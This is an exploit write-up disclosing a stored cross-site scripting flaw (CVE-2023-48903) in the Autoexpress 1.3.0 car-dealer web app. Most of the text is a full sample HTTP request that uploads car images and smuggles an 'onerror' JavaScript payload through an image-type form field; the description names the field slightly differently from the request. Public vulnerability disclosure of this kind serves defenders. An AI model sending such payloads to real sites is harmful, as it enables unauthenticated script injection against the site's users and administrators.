Tramyardg Autoexpress 1.3.0 Cross Site Scripting

# Exploit Title: tramyardg autoexpress - Stored Cross-Site Scripting (XSS)# Google Dork: N/A# Date: 11/28/2023# Exploit Author: Scott White# Vendor Homepage: https://github.com/tramyardg/autoexpress# Version: v1.3.0# Tested on: Ubuntu 22.04.3 LTS + Apache/2.4.52# CVE : CVE-2023-48903# References:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48903https://www.cve.org/CVERecord?id=CVE-2023-48903# Description:Autoexpress 1.3.0 is affected by a stored cross-site scripting (XSS) feature that allows for an unauthenticated attacker to execute JavaScript commands.# Proof of Concept:+ Go to "http://localhost/autoexpress"+ Craft POST request to /autoexpress/admin/api/uploadCarImages.php within BurpSuite (Repeater)+ The form-data name "imageType[]" is vulnerable# Sample RequestPOST /autoexpress/admin/api/uploadCarImages.php HTTP/1.1Host: localhostContent-Length: 17016Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9juDWgTa5YsjE2YROrigin: http://localhostAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close------WebKitFormBoundary9juDWgTa5YsjE2YRContent-Disposition: form-data; name="files[]"; filename="image.jpeg"Content-Type: image/jpegIMAGE_CONTENT------WebKitFormBoundary9juDWgTa5YsjE2YRContent-Disposition: form-data; name="id"CAR_ID------WebKitFormBoundary9juDWgTa5YsjE2YRContent-Disposition: form-data; name="fd[]"IMAGE_CONTENT_BASE64_ENCODED------WebKitFormBoundary9juDWgTa5YsjE2YRContent-Disposition: form-data; name="imgType[]"data:image/jpeg;base64"onerror=alert(1002)<!--------WebKitFormBoundary9juDWgTa5YsjE2YR--